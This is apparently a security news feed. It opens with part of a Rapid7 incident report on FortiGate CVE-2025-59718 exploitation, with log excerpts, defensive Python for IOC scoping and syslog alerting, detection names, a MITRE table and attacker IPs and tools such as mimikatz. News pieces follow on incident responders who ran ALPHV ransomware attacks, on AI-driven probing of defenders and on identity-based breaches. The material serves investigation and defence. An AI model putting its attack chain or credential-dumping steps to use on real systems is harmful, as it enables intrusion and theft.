For responders, the creation of multiple new administrative accounts is often a strong indicator of persistence being established. Continuing to work backwards through the timeline, investigators identified that prior to these account creation events, the device’s configuration file was downloaded through the FortiGate UI. From an investigative perspective, configuration exports are highly valuable to attackers because they effectively serve as a blueprint of the environment, exposing network architecture, authentication mechanisms/settings, device relationships, and occasionally, sensitive credentials.

logid="0100032095" type="event" subtype="system" level="warning" 
vd="root" logdesc="Admin performed an action from GUI" user="admin" 
ui="GUI(104.28.227[.]105)" action="download" status="success" 
msg="System config file has been downloaded by user admin via GUI(104.28.227[.]105)"

The session associated with the configuration download was established from an external IP address flagged as malicious by multiple security vendors, using a local account already present on the device. These findings could then be used as IOCs to scope the available FortiGate logs for additional leads.
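Once responders have a set of known-bad addresses, scoping the remaining FortiGate logs against them can be sketched as below. The IP set and log lines are illustrative; the IOCs in this report are published defanged.

```python
import re

# Illustrative known-bad set; the report publishes these defanged.
MALICIOUS_IPS = {"45.32.216.250", "104.28.227.105"}

IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

def scope_by_ioc(log_lines):
    """Yield (line_no, ip, line) for log lines containing a known-bad IP."""
    for n, line in enumerate(log_lines, 1):
        for ip in IP_RE.findall(line):
            if ip in MALICIOUS_IPS:
                yield n, ip, line
                break

logs = [
    'ui="GUI(104.28.227.250)" action="login"',
    'ui="GUI(104.28.227.105)" action="download" msg="System config file..."',
]
for n, ip, line in scope_by_ioc(logs):
    print(n, ip)   # 2 104.28.227.105
```

Every hit becomes a new pivot point: the surrounding lines reveal what else the session touched, which is exactly how the timeline here was walked backwards.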

By correlating activity with the known malicious IP addresses, investigators identified the true entry point: administrative SSO logins to the FortiGate appliance with valid accounts. Another important detail was that there was no evidence of brute-forcing activity for these local accounts. The initial access was established approximately two weeks before any subsequent malicious activity, indicating the attacker used this time to secure consistent access to the environment via the FortiGate device.

Actions such as changing configurations, creating accounts, and downloading configurations might seem harmless individually. However, when viewed together, these activities established a clear pattern consistent with the exploitation of CVE-2025-59718 that facilitated authentication bypass.

Once this groundwork was established through persistence mechanisms and discovery, attackers began authenticating into the environment with their newly created accounts via the SSL VPN connections that led us to investigate the FortiGate device in the first place. These sessions effectively transformed the firewall into an ingress point into the internal network, allowing attackers to move beyond the edge device.

This investigation highlights a common reality in incident response where the first indicator of suspicious activity is rarely the beginning of the story. Instead, responders are often working from a point somewhere in the middle, tasked with reconstructing attacker behavior and peeling back layers of activity to uncover how access was first obtained. 

By following the digital breadcrumbs left behind within available evidence sources, investigators were able to trace the intrusion back to its origin. This process emphasizes the importance of working backward through artifacts and telemetry, recognizing that each piece of data may lead to an earlier stage of attacker activity.

Network edge devices such as firewalls and VPN appliances are often the main vectors of initial access. Despite being critical infrastructure in modern environments, they rarely receive the same visibility as monitored endpoints. Even so, these edge devices can provide valuable evidence during investigations and reveal how initial access went unnoticed.

Conclusion: Key takeaways for defenders

The human element of investigation is crucial. Effective investigations demand a mindset of curiosity: on one side, the willingness to dig deeper; on the other, the ability to look at the big picture. At face value these can seem contradictory, but each plays a specific role within an incident response investigation.

Curiosity is what drives responders to grapple with the initial evidence, question assumptions, and identify which threads are worth pulling. It allows responders to move beyond surface-level observations and begin forming hypotheses about what may have occurred. The willingness to dive deeper is what turns those hypotheses into answers. Rather than stopping at the first suspicious event, responders must continue pivoting across logs, correlating activity, and tracing actions further back in time. At the same time, maintaining a big-picture perspective is critical. Individual artifacts or events may appear benign in isolation but when viewed chronologically the attacker behavior emerges.

Looking past any specific incident response methodology, visibility into the environment is essential. Even the strongest investigative approach is limited without access to the right telemetry, which prevents responders from fully reconstructing an intrusion. In particular, as seen in this investigation, visibility into edge-device activity can play a crucial role in unraveling IAV. The network edge is a hostile environment, yet it is frequently less monitored.

As is often the case with externally facing services and devices, the network edge is constantly targeted. Due to the sheer volume of persistent targeting, this environment can prove difficult to monitor for successful malicious intrusions. Implementing centralized syslog monitoring across these edge devices can close these visibility gaps. It can provide a real-time audit trail of connection attempts, configuration changes, and potential exploit signatures that occur before a threat reaches the internal network.
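As a rough sketch of the centralized-monitoring idea, a minimal UDP listener that receives forwarded edge-device syslog and flags patterns seen in this investigation might look like the following. This is illustrative only: a production deployment would use a hardened collector (rsyslog, syslog-ng, or a SIEM forwarder), and the alert markers are assumptions drawn from the log excerpts above.

```python
import socket

# Assumed markers, based on the FortiGate log excerpts in this post.
ALERT_MARKERS = (
    'action="download"',            # config file downloaded via GUI
    "sso-forticloud-admin",         # new SSO administrator account created
    'cfgpath="vpn.ssl.settings"',   # SSL VPN configuration changed
)

def is_alert(message: str) -> bool:
    """Return True when a forwarded log line matches a watched marker."""
    return any(marker in message for marker in ALERT_MARKERS)

def listen(host: str = "0.0.0.0", port: int = 5514) -> None:
    """Minimal UDP syslog receiver; blocks forever."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))
    while True:
        data, addr = sock.recvfrom(8192)
        msg = data.decode("utf-8", errors="replace")
        if is_alert(msg):
            print(f"ALERT from {addr[0]}: {msg[:120]}")
```

Even a simple marker list like this would have surfaced the configuration download and SSO account creation in this case days before any endpoint telemetry fired.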

By effectively pulling on each investigative thread and ensuring visibility across both internal systems and edge devices, defenders can uncover compromises that might otherwise remain hidden. Often, the path to the beginning of the intrusion is already present; it simply requires knowing where, and how, to look.

Detection coverage for Rapid7 customers

Rapid7 actively monitors for emerging threats and leverages evidence from incident response engagements to develop new detection capabilities. Detections have been created and implemented by Rapid7 to pinpoint both exploitation attempts and post-exploitation activities related to FortiGate CVE-2025-59718. For InsightIDR and MDR customers, these detections alert on attacker activity consistent with the techniques described in this blog, enabling earlier identification and response before an intrusion can escalate further.

Detections:

  • Potential Exploitation - FortiGate Admin SSO Login and Config Download via External IP

  • Exfiltration - FortiGate Config Downloaded Using GUI via External IP

  • Suspicious Authentication - FortiGate SSO Login via External IP

Mitigation guidance

Please refer to our initial blog from December 2025.

MITRE ATT&CK Techniques

Tactic | Technique | Details
Initial Access | Exploit Public-Facing Application (T1190) | Exploitation of vulnerability CVE-2025-59718 on FortiGate firewalls.
Persistence | Create Account (T1136) | Creation of local accounts on FortiGate firewalls.
Persistence and Initial Access | Valid Accounts (T1078) | Use of created accounts and compromised accounts for SSL VPN and RDP authentication.
Defense Evasion | Impair Defenses (T1562) | Firewall rules added to allow for attacker access.
Credential Access | OS Credential Dumping (T1003) | Execution of Mimikatz targeting the local system and Windows Registry hives containing credentials.
Discovery | System Network Configuration Discovery (T1016) | Download of FortiGate firewall configuration files containing sensitive networking information.
Discovery | Network Service Scanning (T1046) | Execution of network scanning tools such as Advanced_Port_Scanner to scan internal IP addresses over the SMB protocol.
Lateral Movement | Remote Services (T1021) | Use of Remote Desktop Protocol (RDP).
Execution | Service Execution (T1569.002) | Remote execution of the Sysinternals tool PsExec to test credentials against an impacted system.

Indicators of compromise (IOCs)

IOC | Description
Advanced_IP_Scanner_2.5.4594.1.exe | Advanced IP Scanner tool utilized by the attacker.
advanced_ip_scanner.exe | Advanced IP Scanner tool utilized by the attacker.
mimikatz.exe | An open-source post-exploitation tool utilized by the attacker to extract sensitive authentication credentials.
Advanced_port_scanner_2.5.3869.exe | An open-source network utility utilized by the attacker to quickly map active devices and identify open ports.
23.163.8[.]21 | Attacker IP address that targeted FortiGate device.
45.32.216[.]250 | IP address used by the attacker during FortiGate configuration changes.
45.84.107[.]17 | IP address identified in malicious interaction with SSLVPN.
45.80.186[.]84 | IP address identified in malicious interaction with SSLVPN.
185.219.157[.]127 | IP address identified in malicious interaction with SSLVPN.
185.175.59[.]238 | IP address identified in malicious interaction with SSLVPN.
198.98.54[.]209 | Attacker IP address that targeted FortiGate device and SSO login.
45.80.184[.]229 | Attacker IP address that targeted FortiGate device and SSLVPN.
45.80.184[.]241 | Attacker IP address that targeted FortiGate device and SSLVPN.
42.200.230[.]178 | Attacker IP address that targeted FortiGate device and SSLVPN.
103.20.235[.]155 | IP address identified in malicious authentications to SSO login.
104.28.227[.]105 | IP address identified in attacker download of FortiGate configuration file.

Feds say another DigitalMint negotiator ran ransomware attacks and helped extort $75 million

12 March 2026 at 09:30

A 41-year-old South Florida man is accused of conducting at least 10 ransomware attacks and helping accomplices extort a combined $75.25 million in ransom payments while he was working as a ransomware negotiator for DigitalMint. 

Five of Angelo John Martino III’s alleged victims hired DigitalMint, which assigned Martino to conduct ransomware negotiations on their clients’ behalf — putting him in a position to play both sides, as the criminal responsible for the attack and the lead negotiator for his alleged victims, according to federal court records unsealed Wednesday.

Martino allegedly obtained an affiliate account on ALPHV, also known as BlackCat, and conspired with other former cybersecurity professionals to break into victims’ networks, steal and encrypt data, and extort companies for ransoms over a six-month period in 2023.

Martino was an unnamed co-conspirator in an indictment filed in November 2025 against Kevin Tyler Martin, another former ransomware negotiator at DigitalMint, and Ryan Clifford Goldberg, a former manager of incident response at Sygnia. Goldberg and Martin pleaded guilty in December to participating in a series of ransomware attacks and are scheduled for sentencing April 30.

Prosecutors accuse Martino of providing confidential information regarding ransomware negotiations to ALPHV co-conspirators to maximize the ransom payment. His attorney did not immediately respond to a request for comment.

The five U.S.-based victims that hired DigitalMint and unwittingly tapped Martino to allegedly conduct ransomware negotiations with himself and his co-conspirators include a nonprofit and companies in the hospitality, financial services, retail and medical industries. All five of those victims paid a ransom.

Goldberg and Martin were not specifically named as co-conspirators in those attacks. Prosecutors previously said they only successfully extorted a financial payment from one of their victims for nearly $1.3 million.

Cybersecurity firm that employed Martino responds

DigitalMint said they suspended Martino’s access to systems when the Justice Department notified the company they were investigating him on April 3 and fired him the next day. The company, which is not accused of any knowledge or involvement with the crimes, added it was not aware that Martino and Martin were already involved in ransomware-related schemes before they were hired. 

“We strongly condemn these former employees’ criminal behavior, which violated our values, ethical standards and the law,” DigitalMint CEO Jonathan Solomon said in a statement to CyberScoop.

“DigitalMint has fully cooperated with law enforcement from the outset and does not expect further charges,” Solomon added. “While no organization can completely eliminate insider risk, we take incidents like this extremely seriously and have strengthened safeguards and internal controls to further reduce the likelihood of similar conduct.”

DigitalMint did not directly answer questions about whether it refunded its clients who were allegedly victimized by Martino. “We are not able to discuss specific client relationships or fee arrangements due to confidentiality obligations,” a spokesperson said in a statement. “We remain committed to our clients and have addressed any commercial matters directly with those parties.”

The company also declined to describe the circumstances under which it was hired and assigned Martino to conduct ransomware negotiations on the attacks he allegedly committed. Yet, in a statement it noted: “The charging documents do not allege that Martino referred or brought these victims to DigitalMint.”

The case against Martino showcases an extreme, albeit rare, example of the dark underbelly of ransomware negotiation as a practice. The pitfalls of ransomware negotiation are numerous, and these backchannel negotiations, which remain largely unscrutinized, can go awry for many reasons. 

Authorities seize about $12M in assets, set $500K bond

Martino is charged with conspiracy to interfere with commerce by extortion and faces up to 20 years in prison. He is scheduled to enter a plea March 19. 

Authorities seized nearly $9.2 million in five types of cryptocurrency from 21 wallets controlled by Martino. Other items seized from Martino include a 1999 Nissan Skyline, a 2024 Polaris RZR, a 2023 trailer and a 29-foot boat manufactured in 2023.

Officials also seized two properties owned by Martino in Nokomis, Florida, including a bayfront home with an estimated value of $1.68 million and a second single-family home with an estimated value of $396,000. The bayfront home was reported as the second-largest real estate transaction of the week when Martino and his wife purchased the home for $1.791 million in February 2024.

Aerial shot of one of the Nokomis, Florida, properties authorities seized from Angelo Martino. (Redfin)

Martino surrendered to the U.S. Marshals in Miami Tuesday and was released on a $500,000 bond. He is restricted from traveling outside the Southern District of Florida and is prohibited from working in the cybersecurity industry.

ALPHV/BlackCat was a notorious ransomware and extortion group linked to a series of attacks on critical infrastructure providers. The ransomware variant first appeared in late 2021, and was later used in dozens of attacks on organizations in the health care sector.

The group behind the ransomware strain also claimed responsibility for the February 2024 attack on UnitedHealth Group subsidiary Change Healthcare, which paid a $22 million ransom and became the largest health care data breach on record, compromising data on about 190 million people.

Two of Martino’s alleged victims paid even higher ransoms in 2023, according to prosecutors, including a nearly $26.8 million payment from the unnamed nonprofit, and a nearly $25.7 million payment from the unnamed financial services company.

You can read the formal charge prosecutors filed against Martino below.

The post Feds say another DigitalMint negotiator ran ransomware attacks and helped extort $75 million appeared first on CyberScoop.

How ‘silent probing’ can make your security playbook a liability

By: Greg Otto
2 March 2026 at 06:00

For years, cyberattacks followed a familiar pattern: reconnaissance, exploitation, persistence, impact. Defenders built their strategies around that cycle, patching vulnerabilities, monitoring indicators, and working to reduce dwell time. But a quieter shift is underway.

Today’s most sophisticated adversaries are using AI to study how organizations defend themselves. They run what we call “silent probing campaigns”: long-term, subtle operations designed to map how a team detects threats, escalates issues, and responds under pressure. These campaigns focus on learning the defender’s habits, workflow, and decision points so attackers can time and tailor follow-on actions to evade detection. This reframes cyber risk, turning it from a technical problem into a behavioral one.

From finding vulnerabilities to studying defenders

Historically, attackers focused solely on technical gaps, whether from an unpatched server, exposed credentials or a misconfigured cloud. The objective was to find the weakness and exploit it before someone else did. Silent probing adds a new “learning” phase to that playbook.

Attackers study how an organization responds as carefully as they study its systems. Using AI over weeks or months, they quietly measure detection and escalation speed, learn which alerts get ignored, and infer patterns like shift coverage, alert fatigue, and process bottlenecks.

Over time, these subtle probes generate data that feeds adaptive models. Those models help attackers learn what triggers a response, how quickly teams react, and where detection tends to falter. This means when a major attack finally unfolds, it has already been optimized against the organization’s real defensive patterns.

At the same time, organizations are embedding AI into their security operations, from automated triage to autonomous response orchestration. However, this shift introduces a new risk: the very systems designed to defend the enterprise can become part of the attack surface.

As organizations rely more heavily on AI to run their security operations, these systems need wide visibility and access to work properly. They often connect to cloud platforms, identity systems, and endpoint controls so they can detect threats and act quickly. But that level of access concentrates a substantial amount of power. If one of these AI-driven systems is compromised or manipulated, it doesn’t just expose a single tool; it can give an attacker broad reach across the environment. In that scenario, the technology designed to protect the organization can accelerate the damage.

Automation increases risk when AI systems can take action without human approval, such as isolating devices, resetting passwords, or changing configurations. Clear limits and guardrails are required, since manipulated inputs or faulty interpretations can trigger rapid wide-reaching disruption. Risk depends on the system’s authority and the controls around it.

AI hallucination in security operations can cause systems to misidentify threats, isolate the wrong assets or overlook the real threat. Repeated errors can erode trust in the system, or worse, create a false sense of confidence in its automated decisions. This affects judgment, decision-making, and how risk is understood in real time.

The risk of predictable defenses

Silent probing reveals how predictable an organization’s defenses are. Attackers are now looking for patterns in defensive behavior: response consistency across shifts, routinely ignored alerts, predictable incident response steps, and whether noisy tools accidentally hide slow-moving threats.

When defensive behavior becomes visible and predictable, it can be studied and exploited. Organizations need to understand how their defenses appear from the outside and assess their behavioral exposure the same way red teams test technical controls. This includes understanding how easily an outsider can identify detection thresholds, how clearly response times can be measured, and how much operational routine can be learned through quiet, repeated probing. The key question is whether patterns of response are unintentionally teaching attackers how to succeed.

Readiness in the age of AI

As AI plays a bigger role in security operations, oversight has to evolve alongside it. Strong governance starts with clearly defining what AI systems are allowed to do. Organizations need to be explicit about which actions can happen automatically and which require human approval. Likewise, least-privilege principles should apply not only to people, but also to machines. AI-driven tools should be tested regularly and reviewed for drift, bias, and inaccurate conclusions. Wherever possible, detection and response authority should be separated to avoid concentrating too much power in a single system. Centralization without control may feel efficient, but in practice, it creates fragility.

Still, policies and guardrails alone are not enough. As attackers use AI to understand defenders, defenders must sharpen their own ability to think like their adversaries. Security professionals need to evaluate how their tools perform and how they might be observed, manipulated, or misled. This requires questioning automated decisions, stepping in when necessary, and investigating anomalies—especially when the system appears confident in its conclusions.

This is why hands-on simulations and AI-focused red teaming matter. Teams need experience in environments that simulate adaptive adversaries who adjust their tactics based on defensive responses, not just textbook attack scenarios. They need to understand AI’s detection capabilities and the risks introduced by poor configurations or blind trust. The gap organizations face has become more cognitive than technological, and closing that gap requires continuous, measurable skill development, including AI literacy, offensive AI awareness, and the ability to critically evaluate automated outputs.

In an AI-first era, resilience depends on an organization defending itself as though it is always being watched. Silent probing allows attackers to understand detection thresholds, escalation speed, and response consistency over weeks or months. This quiet observation can now serve as a precursor to a major attack on an enterprise.

Security leaders need to focus on what their organizations reveal through day-to-day defensive behavior. When attackers can observe, learn, and adapt over time, predictable responses become a liability because they are easy to study and exploit.

Dimitrios Bougioukas is senior vice president of training at Hack The Box, where he leads the development of advanced training initiatives and certifications that equip cybersecurity professionals worldwide with mission-ready skills.

The post How ‘silent probing’ can make your security playbook a liability appeared first on CyberScoop.

Unit 42: Nearly two-thirds of breaches now start with identity abuse

17 February 2026 at 06:00

Identity is still the primary entry point for cyberattacks, according to Palo Alto Networks’ threat intelligence firm Unit 42. In its annual incident response report released Tuesday, Unit 42 found that identity-based techniques accounted for nearly two-thirds of all initial network intrusions last year. 

Social engineering was the leading attack method, accounting for one-third of the 750 incidents Unit 42 responded to in the one-year period ending in September 2025. Attackers also bypassed security controls with compromised credentials, brute-force attacks, overly permissive identity policies and insider threats, researchers said.

The persistent pitfalls of identity extended beyond initial access, with an identity-related element playing a critical role in nearly 90% of all incidents last year. Unit 42’s report highlights the explosive impact of identity abuse, and pins much of the problem on poor security controls and misconfigurations across interconnected tools and systems.

“Across the attack lifecycle, the biggest thing is that once you have an identity, you’ve got everything, you’ve got the key and you’re in,” Sam Rubin, senior vice president of consulting and threat intelligence at Unit 42, told CyberScoop. “From a defense standpoint, enterprises are still not very good at finding the signal in the noise, essentially the detection when an identity-based tactic is used because there isn’t unauthorized access per se from a technical telemetry standpoint, and it becomes a harder detection mechanism.”

Vulnerability exploits, an ever-moving target, were still prolific and accounted for 22% of initial intrusions across attacks, but humans remain the weakest link, Rubin said. 

The rise of machine-based identities and AI agents, which require an identity to take action, is expanding the attack surface for cybercriminals. Identity challenges are manifesting in the software supply chain as well, as API access and SaaS integrations become another weak link and way in for attackers if access keys aren’t properly controlled.

An attack on Salesloft Drift customers last summer highlighted how tightly integrated services can unravel and expose victims that are multiple layers removed from the vendor. More than 700 organizations were impacted directly, but Salesloft Drift’s integrations with dozens of third-party tools opened many additional paths of potential compromise. 

More broadly, attackers are jumping from branch offices into a victim’s headquarters or data centers because too many accounts remain over-permissioned and cloud-based accounts are established with too much privilege or a lack of segmentation, Rubin said. 

These gaps allow threat groups to turn break-ins into significant attacks. 

“We just see this time and again that there could have been better identity-based practices that would have constrained the blast radius, even if it didn’t stop the initial access,” Rubin said. 

“It’s a problem of signal and noise,” he added. “Think about a global enterprise and all of this authenticated, legitimate activity happening every day. How do you see and identify the one instance where a user is already authenticated but doing something that they shouldn’t do?”

Large and older organizations are at a greater disadvantage, Rubin said. Over time, their technology stacks have evolved to include legacy systems acquired through various business deals. This leaves IT teams managing a patchwork of disparate systems that are poorly integrated, creating significant security vulnerabilities. 

“We forgot as defenders to consider the entire attack chain, because too often we see the defense happens in silos,” Rubin said, adding that attacks that pivot from endpoints to cloud-based services are commonly missed. 

Each of those jumps gives defenders a chance to thwart attacks. Nearly 90% of the attacks Unit 42 investigated last year involved malicious activity across multiple attack surfaces.

Financially motivated attacks accounted for most of the 750 incidents Unit 42 responded to last year. Unit 42 did not say how many of those attacks resulted in payments, but it said median payments increased 87% year-over-year to $500,000 last year. 

Attackers continue to pick up speed as well, exfiltrating data from victim networks with a median duration of two days. Attackers stole data in under one hour in 22% of the attacks Unit 42 responded to last year. 

Unit 42’s annual look-back spotlights critical areas of concern and attack trends that continue to take root, yet it’s not comprehensive. The report’s visibility is limited to incidents that went from bad to worse and prompted victims to seek help from Unit 42. 

“The hardest thing about incident response in cybersecurity,” Rubin said, “is there is no one global spot for how much is going on.”

The post Unit 42: Nearly two-thirds of breaches now start with identity abuse appeared first on CyberScoop.

Former incident responders plead guilty to ransomware attack spree

19 December 2025 at 16:53

Former cybersecurity professionals Ryan Clifford Goldberg and Kevin Tyler Martin pleaded guilty Thursday to participating in a series of ransomware attacks in 2023 while they were employed at cybersecurity companies tasked with helping organizations respond to ransomware attacks.

Goldberg, who was a manager of incident response at Sygnia, and Martin, a ransomware negotiator at DigitalMint at the time, collaborated with an unnamed co-conspirator to attack victim computers and networks and use ALPHV, also known as BlackCat, ransomware to extort payments.

The plea deals mark a relatively quick turnaround as prosecutors successfully persuaded the pair to cop to their crimes less than three months after they were indicted in the U.S. District Court for the Southern District of Florida. Goldberg was arrested Sept. 22 and Martin was arrested Oct. 14. 

Goldberg and Martin confirmed in their respective plea agreements that the total losses caused by their crimes exceeded $9.5 million, according to federal court records. 

A spokesperson for DigitalMint said the company cooperated with the Justice Department throughout its investigation and supports the outcome as a step toward accountability. 

“We strongly condemn his actions, which were undertaken without the knowledge, permission or involvement of the company,” the spokesperson said in a statement. “His behavior is a clear violation of our values and ethical standards.”

Sygnia did not immediately respond to a request for comment.

Goldberg and Martin each pleaded guilty to one of the three counts brought against them — conspiracy to interfere with interstate commerce by extortion — effectively reducing their maximum penalty from 50 years in federal prison to 20 years. 

Victims impacted by the attacks over a six-month period in 2023 included a medical company based in Florida, a pharmaceutical company based in Maryland, a California doctor’s office, an engineering company based in California and a drone manufacturer in Virginia, according to the indictment.

Prosecutors said Goldberg, Martin and their co-conspirator received a nearly $1.3 million ransom payment from the medical company in May 2023, but did not successfully extort a financial payment from the other victims. 

Goldberg and Martin are each ordered to forfeit $342,000, which represents the value of proceeds traced to their crimes, according to their plea agreements. The court may also fine each of them up to $250,000 and order additional restitution.

Officials said they will recommend reduced sentences for Goldberg and Martin as long as they make full, accurate and complete disclosures of their offenses and do not commit any further crimes. 

Goldberg and Martin “abused a position of public or private trust, or used a special skill, in a manner that significantly facilitated the commission or concealment” of their crimes, prosecutors said.

The unnamed co-conspirator, who also worked at DigitalMint, allegedly obtained an affiliate account on ALPHV, which the trio used to commit ransomware attacks.

ALPHV/BlackCat was a notorious ransomware and extortion group linked to a series of attacks on critical infrastructure providers. The ransomware variant first appeared in late 2021, and was later used in dozens of attacks on organizations in the health care sector.

The group behind the ransomware strain also claimed responsibility for last year’s attack on UnitedHealth Group subsidiary Change Healthcare, which paid a $22 million ransom and became the largest health care data breach on record, compromising data on about 190 million people.

The group is believed to have ceased operations in March 2024.

The post Former incident responders plead guilty to ransomware attack spree appeared first on CyberScoop.

Inside the BHIS SOC: A Conversation with Hayden Covington 

By: BHIS
3 December 2025 at 09:00

What happens when you ditch the tiered ticket queues and replace them with collaboration, agility, and real-time response? In this interview, Hayden Covington takes us behind the scenes of the BHIS Security Operations Center, where analysts don’t escalate tickets, they solve them.

The post Inside the BHIS SOC: A Conversation with Hayden Covington  appeared first on Black Hills Information Security, Inc..

Prosecutors allege incident response pros used ALPHV/BlackCat to commit string of ransomware attacks

3 November 2025 at 14:51

Federal prosecutors allege that three cybersecurity professionals, whose job was to help companies respond to ransomware attacks, instead carried out their own ransomware schemes against five U.S. businesses in 2023.

Ryan Clifford Goldberg, Kevin Tyler Martin and an unnamed co-conspirator — all U.S. nationals — began using ALPHV, also known as BlackCat, ransomware to attack companies in May 2023, according to indictments and other court documents in the U.S. District Court for the Southern District of Florida. 

At the time of the attacks, Goldberg was a manager of incident response at Sygnia, while Martin, a ransomware negotiator at DigitalMint, allegedly collaborated with Goldberg and another co-conspirator, who also worked at DigitalMint and allegedly obtained an affiliate account on ALPHV. 

The trio are accused of carrying out the conspiracy from May 2023 through April 2025, according to an affidavit. The Chicago Sun-Times was the first to report on the indictment.

Victims impacted by the attacks over a six-month period in 2023 included a medical company based in Florida, a pharmaceutical company based in Maryland, a California doctor’s office, an engineering company based in California and a drone manufacturer in Virginia. 

Goldberg, Martin and their co-conspirator received a nearly $1.3 million ransom payment from the medical company in May 2023, but did not successfully extort a financial payment from the other victims, prosecutors said. 

Sygnia confirmed Goldberg was formerly employed by the company. “Immediately upon learning of the situation, he was terminated,” the company said in a statement. 

Goldberg’s attorney declined to comment.

DigitalMint confirmed in a statement Monday that a former employee was indicted for organizing and participating in ransomware attacks. The company did not say when or how it became aware of Martin and his co-worker’s alleged criminal activities, and did not describe the circumstances regarding the end of their employment.

“The charged conduct took place outside of DigitalMint’s infrastructure and systems. The co-conspirators did not access or compromise client data as part of the charged conduct,” the company said in a statement. “No one potentially involved in the charged scheme has worked at the company in over four months.”

ALPHV/BlackCat was a notorious ransomware and extortion group linked to a series of attacks on critical infrastructure providers. The ransomware variant first appeared in late 2021, and was later used in dozens of attacks on organizations in the health care sector. 

The group behind the ransomware strain also claimed responsibility for last year’s attack on UnitedHealth Group subsidiary Change Healthcare, which paid a $22 million ransom and became the largest health care data breach on record, compromising data on about 190 million people. 

Goldberg and Martin were both indicted Oct. 2 for conspiring to interfere with commerce by extortion, interference with commerce by extortion, and intentional damage to a protected computer. 

Martin was arrested Oct. 14 and freed on a $400,000 bond Oct. 24. He pleaded not guilty and is prohibited from working in cybersecurity while awaiting trial. Martin’s attorney did not immediately respond to a request for comment.

Goldberg was arrested Sept. 22 and ordered to remain in custody pending trial due to flight risk. Goldberg and his wife boarded a one-way flight to Paris from Atlanta on June 27 and remained in Europe until Sept. 21. Goldberg then flew directly from Amsterdam to Mexico City, where he was arrested upon landing and deported to the United States.

Court records show Goldberg allegedly confessed he was recruited by the unnamed co-conspirator to “try and ransom some companies” during an interview with the FBI on June 17. The FBI seized his devices that day.

According to authorities, Goldberg allegedly admitted that he conducted the attacks to get out of debt. He also allegedly told FBI agents that he and his two accomplices successfully extorted a ransom payment from the medical company, which earned him a $200,000 share.

Martin and Goldberg each face a maximum penalty of 50 years in federal prison.


The post Prosecutors allege incident response pros used ALPHV/BlackCat to commit string of ransomware attacks appeared first on CyberScoop.

Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 2)

By: BHIS
1 October 2025 at 10:00

But what if we need to wrangle Windows Event Logs for more than one system? In part 2, we’ll wrangle EVTX logs at scale by incorporating Hayabusa and SOF-ELK into my rapid endpoint investigation workflow (“REIW”)! 

The post Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 2) appeared first on Black Hills Information Security, Inc..

Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 1)

By: BHIS
17 September 2025 at 10:09

In part 1 of this post, we’ll discuss how Hayabusa and “Security Operations and Forensics ELK” (SOF-ELK) can help us wrangle EVTX files (Windows Event Log files) for maximum effect during a Windows endpoint investigation!

The post Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 1) appeared first on Black Hills Information Security, Inc..

Stop Spoofing Yourself! Disabling M365 Direct Send

By: BHIS
20 August 2025 at 10:00

Remember the good ol’ days of Zip drives, Winamp, the advent of “Office 365,” and copy machines that didn’t understand email authentication? Okay, maybe they weren’t so good! For a […]

The post Stop Spoofing Yourself! Disabling M365 Direct Send appeared first on Black Hills Information Security, Inc..

5 Things We Are Going to Continue to Ignore in 2025

By: BHIS
10 February 2025 at 11:00

In this video, John Strand discusses the complexities and challenges of penetration testing, emphasizing that it goes beyond just finding and exploiting vulnerabilities.

The post 5 Things We Are Going to Continue to Ignore in 2025 appeared first on Black Hills Information Security, Inc..

Monitoring High Risk Azure Logins 

By: BHIS
12 September 2024 at 10:44

Recently in the SOC, we were notified by a partner that they had a potential business email compromise, or BEC. We commonly catch these by identifying suspicious email forwarding rules, […]

The post Monitoring High Risk Azure Logins  appeared first on Black Hills Information Security, Inc..
